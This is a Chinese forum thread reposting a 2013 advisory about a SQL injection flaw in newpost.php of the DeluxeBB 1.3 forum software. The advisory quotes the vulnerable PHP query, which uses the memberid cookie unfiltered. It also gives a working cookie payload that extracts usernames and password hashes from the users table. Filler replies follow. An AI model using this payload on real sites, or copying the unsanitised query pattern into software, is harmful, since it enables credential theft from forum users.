查看: 1356|回复: 25

DeluxeBB 1.3 newpost.php页面SQL注入漏洞

[复制链接]
发表于 2013-11-28 10:33:14 | 显示全部楼层 |阅读模式
DeluxeBB是一款基于PHP的论坛程序。  


DeluxeBB的newpost.php页面没有正确地过滤用户所提交的SQL查询参数:  


//inserting thread  
$db->unbuffered_query("INSERT INTO ".$prefix."threads VALUES (NULL, ’$info[fid]’, ’".$_COOKIE[’memberid’]."’, ’$subject’, ’$posticon’, ’0’, ’0’, ’$lock’, ’$pin’, ’0’, ’".htmlspecialchars($_COOKIE[’membercookie’])."’, ’$time’)");  
$tid = $db->insert_id();  


Cookie变量memberid直接在SQL查询中使用,如果关闭了magic_quotes_gpc的话就会导致SQL注入攻击。必须将 membercookie变量设置为Guest才可以利用这个漏洞,否则无法绕过之前的检查。


测试代码:  


membercookie=guest  
memberid=xx’,(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),’none’,0,0,0,0,0,’guest’,’1269081154’)+--+x  


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:  
发表于 2013-11-28 11:23:01 | 显示全部楼层
拿分走人呵呵,楼下继续!
发表于 2013-11-30 14:27:56 | 显示全部楼层
你你你你 呵呵~~~~别这样哦.....  
发表于 2013-11-30 17:38:44 | 显示全部楼层
经过你的指点 我还是没找到在哪 ~~~  
发表于 2013-12-5 08:29:24 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2013-12-6 08:52:39 | 显示全部楼层
世界上那些最容易的事情中,拖延时间最不费力。  
发表于 2013-12-7 22:28:26 | 显示全部楼层
饭可以乱吃,话也可以乱说,但贴子不可以乱发哦  
发表于 2013-12-9 14:47:44 | 显示全部楼层
哈哈,顶你了哦.  
发表于 2013-12-10 12:52:10 | 显示全部楼层
厉害!强~~~~没的说了!  
发表于 2015-2-27 20:01:37 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
高级模式
B Color Image Link Quote Code Smilies

本版积分规则